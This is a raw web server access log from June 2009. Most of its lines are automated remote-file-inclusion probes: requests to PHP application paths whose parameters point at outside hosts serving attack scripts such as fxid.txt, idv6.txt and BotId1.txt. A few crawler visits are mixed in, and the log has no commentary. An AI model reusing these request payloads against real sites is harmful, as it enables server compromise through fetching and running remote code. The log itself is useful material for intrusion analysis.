123.125.64.38 - - [26/Jun/2009:10:13:15 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
72.82.228.83 - - [26/Jun/2009:10:13:32 -0500] "GET /logs/include/lib.inc.php?site_path=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 307 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:10:13:32 -0500] "GET /include/lib.inc.php?site_path=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:10:13:32 -0500] "GET /logs/access_log.1233705600/include/lib.inc.php?site_path=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
72.82.228.83 - - [26/Jun/2009:10:13:44 -0500] "GET /logs/access_log.1242000000/include/lib.inc.php?site_path=http://www.clangamingleague.com/ladder//themes/id1.txt? HTTP/1.1" 404 329 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:10:19:32 -0500] "GET /logs/joomla/index.php?option=com_restaurante&task=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:10:19:32 -0500] "GET /joomla/index.php?option=com_restaurante&task=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:10:19:32 -0500] "GET /logs/access_log.1239235200/joomla/index.php?option=com_restaurante&task=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:10:19:32 -0500] "GET /logs/access_log.1239667200/joomla/index.php?option=com_restaurante&task=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
131.203.76.246 - - [26/Jun/2009:10:19:40 -0500] "GET /logs/access_log.1236643200/errors.php?error=http://www.usher.co.kr//flvPlay/fx29id.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
81.173.19.190 - - [26/Jun/2009:10:19:59 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://othteam1.t35.com/idv6.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
81.173.19.190 - - [26/Jun/2009:10:19:59 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://othteam1.t35.com/idv6.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
81.173.19.190 - - [26/Jun/2009:10:19:59 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://othteam1.t35.com/idv6.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
81.173.19.190 - - [26/Jun/2009:10:21:05 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://othteam1.t35.com/idv6.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
81.173.19.190 - - [26/Jun/2009:10:21:10 -0500] "GET /logs/access_log.1241395200//s_loadenv.inc.php?DOCUMENT_ROOT=http://othteam1.t35.com/idv6.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
81.173.19.190 - - [26/Jun/2009:10:22:07 -0500] "GET /logs/access_log.1239667200//s_loadenv.inc.php?DOCUMENT_ROOT=http://othteam1.t35.com/idv6.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
222.236.47.188 - - [26/Jun/2009:10:22:17 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:10:22:17 -0500] "GET /logs/access_log.1236643200//admin/classes/TplLoad.php?full_path_to_public_program=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:10:22:17 -0500] "GET /logs/access_log.1237075200//admin/classes/TplLoad.php?full_path_to_public_program=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:10:22:18 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
204.62.54.203 - - [26/Jun/2009:10:24:05 -0500] "GET /_vti_cnf?D=A HTTP/1.1" 301 334 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
204.62.54.203 - - [26/Jun/2009:10:24:06 -0500] "GET /_vti_cnf/?D=A HTTP/1.1" 200 676 "-""Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)"
195.34.78.110 - - [26/Jun/2009:10:24:22 -0500] "GET //include/admin.lib.inc.php?site_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:24:22 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:24:22 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:24:22 -0500] "GET //include/admin.lib.inc.php?site_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:24:22 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:24:22 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:24:37 -0500] "GET //include/admin.lib.inc.php?site_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:24:37 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:24:37 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:26:02 -0500] "GET //include/admin.lib.inc.php?site_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:26:03 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:26:04 -0500] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
60.43.229.5 - - [26/Jun/2009:10:26:10 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 325 "-""Mozilla/5.0"
60.43.229.5 - - [26/Jun/2009:10:26:10 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 330 "-""Mozilla/5.0"
60.43.229.5 - - [26/Jun/2009:10:26:10 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 352 "-""Mozilla/5.0"
209.90.77.43 - - [26/Jun/2009:10:31:09 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
209.90.77.43 - - [26/Jun/2009:10:31:09 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
209.90.77.43 - - [26/Jun/2009:10:31:09 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
60.251.217.4 - - [26/Jun/2009:10:31:58 -0500] "GET //modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.scoringsessions.com///img/large/2006/missionimpossible3/test.gif?? HTTP/1.1" 404 320 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
94.23.195.160 - - [26/Jun/2009:10:32:06 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.brun-sylvain.fr/idv6.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.826"
94.23.195.160 - - [26/Jun/2009:10:32:06 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.brun-sylvain.fr/idv6.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.826"
217.172.179.213 - - [26/Jun/2009:10:32:40 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.brun-sylvain.fr/idv6.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.69"
217.172.179.213 - - [26/Jun/2009:10:32:40 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.brun-sylvain.fr/idv6.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.69"
195.34.78.110 - - [26/Jun/2009:10:35:39 -0500] "GET //shop/main.php/_shop_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:35:39 -0500] "GET /logs//shop/main.php/_shop_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:35:40 -0500] "GET //shop/main.php/_shop_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:35:40 -0500] "GET /logs/access_log.1236297600//shop/main.php/_shop_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:35:40 -0500] "GET /logs/access_log.1237334400//shop/main.php/_shop_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:35:40 -0500] "GET /logs//shop/main.php/_shop_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:35:41 -0500] "GET /logs/access_log.1236297600//shop/main.php/_shop_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:35:41 -0500] "GET /logs/access_log.1237334400//shop/main.php/_shop_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
65.55.106.181 - - [26/Jun/2009:10:40:23 -0500] "GET /logs/access_log.1118275200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.34.78.110 - - [26/Jun/2009:10:47:44 -0500] "GET //shop/main.php/_shop_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:47:44 -0500] "GET /logs//shop/main.php/_shop_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:47:44 -0500] "GET //shop/main.php/_shop_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:47:44 -0500] "GET /logs//shop/main.php/_shop_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:47:44 -0500] "GET /logs/access_log.1239062400//shop/main.php/_shop_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:47:44 -0500] "GET /logs/access_log.1239062400//shop/main.php/_shop_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:47:46 -0500] "GET /logs/access_log.1233619200//shop/main.php/_shop_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:47:46 -0500] "GET /logs/access_log.1233619200//shop/main.php/_shop_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
82.136.20.14 - - [26/Jun/2009:10:47:56 -0500] "GET /logs//admin/classes/errors.php?error=http://kuettner.it/yes.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
82.136.20.14 - - [26/Jun/2009:10:47:57 -0500] "GET //admin/classes/errors.php?error=http://kuettner.it/yes.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
65.55.230.168 - - [26/Jun/2009:10:49:17 -0500] "GET /logs/access_log.1200182400 HTTP/1.1" 200 4561 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
216.17.99.13 - - [26/Jun/2009:10:52:02 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 3248 "-""libwww-perl/5.826"
216.17.99.13 - - [26/Jun/2009:10:52:03 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 3248 "-""libwww-perl/5.826"
216.17.99.13 - - [26/Jun/2009:10:52:04 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 194793 "-""libwww-perl/5.826"
216.17.99.13 - - [26/Jun/2009:10:52:05 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 194793 "-""libwww-perl/5.826"
60.43.229.5 - - [26/Jun/2009:10:52:24 -0500] "GET /logs/access_log.1236643200//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 352 "-""Mozilla/5.0"
213.16.66.122 - - [26/Jun/2009:10:54:09 -0500] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://freewebtown.com/fr0zzen21/id1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
213.16.66.122 - - [26/Jun/2009:10:54:09 -0500] "GET /logs/access_log.1238457600//components/com_simpleboard/file_upload.php?sbp=http://freewebtown.com/fr0zzen21/id1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
213.16.66.122 - - [26/Jun/2009:10:54:09 -0500] "GET //components/com_simpleboard/file_upload.php?sbp=http://freewebtown.com/fr0zzen21/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
213.16.66.122 - - [26/Jun/2009:10:54:13 -0500] "GET /logs/access_log.1240444800//components/com_simpleboard/file_upload.php?sbp=http://freewebtown.com/fr0zzen21/id1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:56:28 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
62.146.47.98 - - [26/Jun/2009:10:56:50 -0500] "GET /logs/access_log.1238112000//modules/agendax/addevent.inc.php?agendax_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
62.146.47.98 - - [26/Jun/2009:10:56:50 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
62.146.47.98 - - [26/Jun/2009:10:56:50 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.146.47.98 - - [26/Jun/2009:10:56:56 -0500] "GET /logs/access_log.1240012800//modules/agendax/addevent.inc.php?agendax_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
195.34.78.110 - - [26/Jun/2009:10:57:20 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:10:57:39 -0500] "GET /logs/access_log.1237680000//skin/zero_vote/ask_password.php?dir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:10:57:39 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
222.236.47.188 - - [26/Jun/2009:10:57:39 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:10:57:44 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.45.56.47 - - [26/Jun/2009:10:57:51 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.826"
216.45.56.47 - - [26/Jun/2009:10:57:51 -0500] "GET /logs/access_log.1238112000//modules/agendax/addevent.inc.php?agendax_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.826"
216.45.56.47 - - [26/Jun/2009:10:57:51 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.826"
216.45.56.47 - - [26/Jun/2009:10:57:51 -0500] "GET /logs/access_log.1240012800//modules/agendax/addevent.inc.php?agendax_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.826"
62.146.47.98 - - [26/Jun/2009:10:58:24 -0500] "GET /logs/access_log.1239667200//modules/agendax/addevent.inc.php?agendax_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
195.34.78.110 - - [26/Jun/2009:10:58:29 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.45.56.47 - - [26/Jun/2009:10:58:49 -0500] "GET /logs/access_log.1239667200//modules/agendax/addevent.inc.php?agendax_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.826"
62.140.23.185 - - [26/Jun/2009:10:59:06 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
62.140.23.185 - - [26/Jun/2009:10:59:07 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.usaenterprise.com/images/images.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
217.171.66.245 - - [26/Jun/2009:10:59:49 -0500] "GET /logs/access_log.1240012800//modules/agendax/addevent.inc.php?agendax_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
217.171.66.245 - - [26/Jun/2009:10:59:49 -0500] "GET /logs/access_log.1238112000//modules/agendax/addevent.inc.php?agendax_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
217.171.66.245 - - [26/Jun/2009:10:59:49 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
217.171.66.245 - - [26/Jun/2009:10:59:49 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
65.55.106.171 - - [26/Jun/2009:11:00:15 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.122.6.62 - - [26/Jun/2009:11:00:52 -0500] "GET /logs/access_log.1238112000//modules/agendax/addevent.inc.php?agendax_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
222.122.6.62 - - [26/Jun/2009:11:00:52 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
222.122.6.62 - - [26/Jun/2009:11:00:52 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
222.122.6.62 - - [26/Jun/2009:11:00:56 -0500] "GET /logs/access_log.1240012800//modules/agendax/addevent.inc.php?agendax_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
222.122.6.62 - - [26/Jun/2009:11:02:48 -0500] "GET /logs/access_log.1239667200//modules/agendax/addevent.inc.php?agendax_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
217.171.66.245 - - [26/Jun/2009:11:02:58 -0500] "GET /logs/access_log.1239667200//modules/agendax/addevent.inc.php?agendax_path=http://www.accesoplugin.com/imgs/info.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
218.38.136.251 - - [26/Jun/2009:11:11:13 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.anydisk.co.kr/upload_data/fxid.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
218.38.136.251 - - [26/Jun/2009:11:11:13 -0500] "GET /logs/access_log.1240012800//skin/zero_vote/ask_password.php?dir=http://www.anydisk.co.kr/upload_data/fxid.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
218.38.136.251 - - [26/Jun/2009:11:11:13 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.anydisk.co.kr/upload_data/fxid.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.136.251 - - [26/Jun/2009:11:11:39 -0500] "GET /logs/access_log.1237680000//skin/zero_vote/ask_password.php?dir=http://www.anydisk.co.kr/upload_data/fxid.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:11:12:07 -0500] "GET //shop/main.php/_shop_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:11:12:08 -0500] "GET /logs/access_log.1236038400//shop/main.php/_shop_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:11:12:08 -0500] "GET /logs/access_log.1236211200//shop/main.php/_shop_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:11:12:08 -0500] "GET /logs//shop/main.php/_shop_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:11:12:23 -0500] "GET //shop/main.php/_shop_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:11:12:23 -0500] "GET /logs//shop/main.php/_shop_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:11:12:24 -0500] "GET /logs/access_log.1236038400//shop/main.php/_shop_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:11:12:24 -0500] "GET /logs/access_log.1236211200//shop/main.php/_shop_path=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
218.38.136.251 - - [26/Jun/2009:11:12:36 -0500] "GET /logs/access_log.1239062400//skin/zero_vote/ask_password.php?dir=http://www.anydisk.co.kr/upload_data/fxid.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
60.251.217.4 - - [26/Jun/2009:11:13:58 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
60.251.217.4 - - [26/Jun/2009:11:13:58 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
60.251.217.4 - - [26/Jun/2009:11:14:04 -0500] "GET /logs/access_log.1240272000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
60.251.217.4 - - [26/Jun/2009:11:14:33 -0500] "GET /logs/access_log.1240531200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.abrasive.ru/id.txt? HTTP/1.1" 404 361 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:11:15:08 -0500] "GET //shop/main.php?_shop_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:11:15:08 -0500] "GET /logs//shop/main.php?_shop_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:11:15:08 -0500] "GET /logs/access_log.1239062400//shop/main.php?_shop_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:11:15:09 -0500] "GET /logs/access_log.1232755200//shop/main.php?_shop_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:11:15:55 -0500] "GET //include/ask_password.php?dir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:11:15:55 -0500] "GET /logs//include/ask_password.php?dir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:11:15:55 -0500] "GET /logs/access_log.1230422400//include/ask_password.php?dir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:11:16:09 -0500] "GET //shop/main.php?_shop_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:11:16:09 -0500] "GET /logs//shop/main.php?_shop_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:11:16:10 -0500] "GET /logs/access_log.1239062400//shop/main.php?_shop_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
195.34.78.110 - - [26/Jun/2009:11:16:10 -0500] "GET /logs/access_log.1232755200//shop/main.php?_shop_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:11:16:14 -0500] "GET //include/main.php?dir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:11:16:14 -0500] "GET /logs//include/main.php?dir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:11:16:14 -0500] "GET /logs/access_log.1230422400//include/main.php?dir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.172.225.50 - - [26/Jun/2009:11:16:17 -0500] "GET //include/ask_password.php?dir=http://shop.gaspard.de//Scripts/idxx.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
